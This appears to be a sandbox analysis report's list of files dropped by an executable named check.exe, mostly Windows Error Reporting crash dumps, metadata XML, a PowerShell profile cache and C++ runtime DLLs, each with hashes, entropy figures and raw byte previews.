Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.9.1.3.9.7.1.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.9.8.1.1.5.9.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.0.c.5.a.e.3.-.0.6.6.e.-.4.8.3.7.-.9.e.e.8.-.2.f.0.c.f.1.3.d.2.4.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.a.f.6.4.b.a.-.1.1.6.1.-.4.9.9.c.-.a.9.8.e.-.1.9.7.8.0.b.1.7.a.e.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.0.-.0.0.0.1.-.0.0.1.4.-.7.8.e.e.-.1.6.0.c.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_4c013ac5-7a2d-4e4f-873d-4fd4818d8838\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3625482046086155
Encrypted:	false
SSDEEP:	192:kYCI8i0PRjSjoR6alVNmyk87YRAC/xLpI8uKGN5kvuwn7VVvMnXVFXv1SnYzuiF4:AI8pPRjSj8nwn5sRzuiFpY4lO80X
MD5:	C87506136314F8BCC7C85D6F7415D1E0
SHA1:	9CA18471BF62C06EFF75A6117269FF353A1E0C26
SHA-256:	7A3F3D1514F8BA9C1FAA2DB0920BAAEB32CA40ECE14B21458A79C748D7AA13D5
SHA-512:	47DE129B35CFD5AC74A49434810206DB8F78D12D974F7B425E96B28B5F48EE5A2C4776562EC97B0639B9870A6612A02553BC5ED06EEC85F8CB878164DE070DE2
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.8.1.7.7.3.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.2.9.9.6.7.7.3.7.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.1.3.a.c.5.-.7.a.2.d.-.4.e.4.f.-.8.7.3.d.-.4.f.d.4.8.1.8.d.8.8.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.1.d.3.a.5.-.a.4.7.8.-.4.2.f.4.-.a.d.5.c.-.9.5.4.f.6.1.5.5.4.0.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.3.0.-.0.0.0.1.-.0.0.1.4.-.2.d.2.e.-.3.7.f.d.5.4.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_559855e4-59d1-4ab8-901a-ddbaae339193\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.362983291840391
Encrypted:	false
SSDEEP:	192:JXfI6vi0PRjSjoR6NCiSmtbLU5JBQDm0GnrfKZiObIBwn76Vgrg+VF+v1SnYzuiO:xIqpPRjSjM/wn2BRzuiFpY4lO80X
MD5:	9D512D3AD258BE2FDC5693B77CBE7F40
SHA1:	55C04EB37CA678E22BF5A16733A56EFA6F42801D
SHA-256:	F902200B3165BA2BFA67E8A38704F99C8AA0D5B9741A1BEA37F9DD60B31D3237
SHA-512:	25AAB2A83AB90DC3E2BE627D76A3D5DF1C8FE96584660E8CF00B2A36EF3BDAFD3CD8663C66B04B9DFD756D14404AFCE38B798A214AAC865A7C01F905A7F8C9EF
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.0.8.8.9.2.1.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.3.4.3.1.2.8.7.3.5.7.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.9.8.5.5.e.4.-.5.9.d.1.-.4.a.b.8.-.9.0.1.a.-.d.d.b.a.a.e.3.3.9.1.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.0.7.5.4.c.a.-.2.d.f.0.-.4.9.8.4.-.8.1.f.d.-.6.e.e.0.1.a.9.8.1.f.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.4.-.6.5.2.8.-.5.5.0.5.5.5.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F40.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	131682
Entropy (8bit):	2.033331177758981
Encrypted:	false
SSDEEP:	384:RiE0ROTa+WTurH0VC35OgVQnAx6v2GXtQCjPZKJNk55SepXdYBBhrf9gV:RF0ROe3urUic7AEg8PQeQepghrfmV
MD5:	F910FE767D0CC2CFAA2CD9090CBE9B44
SHA1:	0CEE5A50256A95D2E74773DE0862324424B5602D
SHA-256:	DBE766C5D49DE0B1A7722B6670213DB1A27E1BE232A068555684727D67393C58
SHA-512:	7746DAE5230976EAE7058CC60B381ECC27A51FE4A706D3C77715AA3FA996AEE13E0EB61358209DA0C3EAFC446C5DAFDC3759BD8F9A2E8EDCAFF1FC690D240C12
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........Wg............$............%..8.......$....-...........\..........`.......8...........T............%...............-.........../..............................................................................eJ......p0......Lw......................T.......0.....Wg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80D7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9606
Entropy (8bit):	3.7063099523546663
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/HjW6YXO7j4gmfCyPpDM89bYRffxmom:R6lXJrW6Y+7j4gmfCyjYpfy
MD5:	EF4EFE033248B8CA03E4218D69D44915
SHA1:	68C66BABFAA3C1A58BCB3E3B22F2E4D026A9C6DE
SHA-256:	9E51C050DF6DC8F888A2C9A0C07638C89196234CBBA0853EAC77FD2085BA447E
SHA-512:	D2AF3A8E3733E80A9FCA2A2408349EE0637E5FA4C58A82B2A3ED02F4B459DA9C109FCD7E2EFFA57A3DD2A51ADE1D3FCC79E1BE3DEAB67C7A24F51AEFC7B270E8
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8146.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.4368483080124905
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg771I90A4XWpW8VYeoYm8M4JbWDFPHyq8vuWZnMZDQcS2d:uIjfpI7dA4m7VlFJS1HW3dMlC2d
MD5:	E88E4BB34F2EC1E585227346F765BFC5
SHA1:	1ABF8F89DDEE95F85067FD0AFB7869CF946ADBB9
SHA-256:	AC5CCA2A0A5ADD98E7D79909D908B375A930862A8FF2097B97081F7608DAD7EB
SHA-512:	BF41AEF62EBC702718A1534B59A52D09BAE21EB1325B5960252E4795002661384035D6E2B3961C87381E248AB0FB5CCF1E3B853B9D8EC2DF703CF3E366886917
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB227.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:51 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	131352
Entropy (8bit):	2.0525147452072816
Encrypted:	false
SSDEEP:	384:Fwr0b7oo4urHkVCsblfBOLDuqVlU1akE+CAj4prT6A7oJ7jUUv+6Lllw:Fwr0bkHurEZBfB8DjbkdRAEui9
MD5:	2582CFB1CE597578B0BBAE78FFC4322E
SHA1:	37B263CDAE3B70939EFD17E0B5096BCFBD077E18
SHA-256:	FE58060ADC1EA487490BE6BE095B9FBC75DF6E2965E92AABEAD7CEF529848A6F
SHA-512:	3165CC8D077B00B3765B6DC32F32CE6241813B355CFA2A1FE303BFABF903A96A0AFAC46A7939C5BA8F8DDA0060C151ADA9035BB446F1A81D80686F8544A03F04
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........Wg............$............%..8.......$....-......4....\..........`.......8...........T............&..p............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB48A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9608
Entropy (8bit):	3.7041942756246935
Encrypted:	false
SSDEEP:	192:R6l7wVeJpY+z6YYsfbIgmfCyPpDM89bPRmafUWFm:R6lXJmE6YjfbIgmfCyjPQafS
MD5:	0CC50DFDD431E2A12F3902B96F9ED303
SHA1:	406863E9F56129C157E4666DC3E30480A8D42454
SHA-256:	057CC31EB492004A9C06B2606BB90A7F487E6774C0CA0215E52C49AD90BA3CA9
SHA-512:	81993E2ADCB8D6433277BFB417E29FF1E8FFD1D1573DD2CA0A3DF379C29F209A11DB4D5FC57C3F20AD65674439C42D64334743F32613FD3EAE443AA635F2AC5A
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4F8.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.437615934918471
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg771I90A4XWpW8VYUYm8M4JbWDFHVoyq8vuWdMZDQcSid:uIjfpI7dA4m7VYJSEW3dMlCid
MD5:	5DF6B0F1936BF15DEE280D73143DEEF9
SHA1:	8183E15C536F8765D6E1505C003F4F7D51BD50C9
SHA-256:	1620D50DE4E027612C01E69F970400745612A718506D28B7033323C30426612F
SHA-512:	B92E2CE19A2FD97C639C1BF479AB7E18D9EDD7B3FE177159BDD306EF8F511E24301E19AB78168140B455B8EFCB58F134F9F37C0EC3E2238EB1E68BF3D3553B8D
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD167.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 9 16:11:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	131462
Entropy (8bit):	2.0674248670429765
Encrypted:	false
SSDEEP:	384:m0n0Zeg3WrHkVCX2kHABo37ZrwqJohU0uO2SF8nq/JjN34XYsxsFkP6TmxTxcPkz:ln0ZR3WrE6LA8ZklMNzmaP6wxc+3Br
MD5:	BD5CBCBEF15649A49DCCFE8262830BF0
SHA1:	4557EF4C1B535B07734106811ADC362BCF8C0D9F
SHA-256:	FB41DA1D7141876842A855A1C9DD5020C5D42A1405BB04CB49F273EC69952622
SHA-512:	A4022D0CB43643680F8C167C395A7EDA712894D008279C7F9808F1F55C90698181A9E7FB2F2D043348F096035C6B97D65BAC5719ECB28921C3EE4073BDACF105
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........Wg............$............%..8.......$....-......4....\..........`.......8...........T...........X&...............-.........../..............................................................................eJ......p0......Lw......................T.............Wg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD253.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9604
Entropy (8bit):	3.704881367562772
Encrypted:	false
SSDEEP:	192:R6l7wVeJydTQ2o6YImkbIgmfCyPpDy89bHEef7tm:R6lXJc26Y5kbIgmfCyhH1fc
MD5:	B42F765B017006BAD7624E2D27029B9B
SHA1:	F944C5F9CD41F2E01CBF8B1275CC3B618011507F
SHA-256:	D86320FACD9324587AFFEE2ECF9E7607E8E3C6A6348C7F52BE8D2E3394CE05F2
SHA-512:	BED016C90A1B2D3D024A9B40BF76E139BD9CAEB3F5274E8C2FD7FF7D3F9325AFC14D739E5D564DC77CF2200F028876B933B05716003772439305E82EB57617CB
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2C1.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.4354878026506155
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg771I90A4XWpW8VYNYm8M4JbWDF6Fyq8vuW/PMZDQcSCd:uIjfpI7dA4m7V9JSaW3/PMlCCd
MD5:	C01227DF613757977CDE9F2A4478E3F3
SHA1:	DB6CCAC2EF230171C4A35292F1CEDC3664990E2F
SHA-256:	43FD0839C7828A219DA6E973759A953EDBCB6750378562BE92E0BBA707776F48
SHA-512:	29EFA0AAB40F77F2837FEBDC2007CC09D96DD0C09F3832540C71497EB2F6B5D9899922299374AD06951397462E3FF87F29C478F4704DF858E0C3070F16907F38
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="623954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	5.324263531310648
Encrypted:	false
SSDEEP:	24:3cSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:sSU4y4RQmFoUeCamfm9qr9trBLNGhNuw
MD5:	70FA0FADD826A7D0307F844E27B94A1C
SHA1:	1690972399B411C8F3030539021EC07AB45CE9EE
SHA-256:	0BD95ADAC82E29FCAAA196F77C4D1F00C3DA36AC3C8582718FAA3174B3EC8602
SHA-512:	B4E66BEE2F75E2B5F1E2CDCE217C54A5C1C5AA93D7BDA4335729663BDED61D6EEF355C40D0CD36304A56FCFBC684C92359BA2AF5F6E786C616AB962C1CE0D37A
Malicious:	false
Reputation:	unknown
Preview:	@...e...........)....................................@..........@...............\|.jdY\.H.s9.!..\|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590112
Entropy (8bit):	6.461874649448891
Encrypted:	false
SSDEEP:	12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
MD5:	01B946A2EDC5CC166DE018DBB754B69C
SHA1:	DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
SHA-256:	88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
SHA-512:	65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	6.499754548353504
Encrypted:	false
SSDEEP:	384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
MD5:	0FE6D52EB94C848FE258DC0EC9FF4C11
SHA1:	95CC74C64AB80785F3893D61A73B8A958D24DA29
SHA-256:	446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
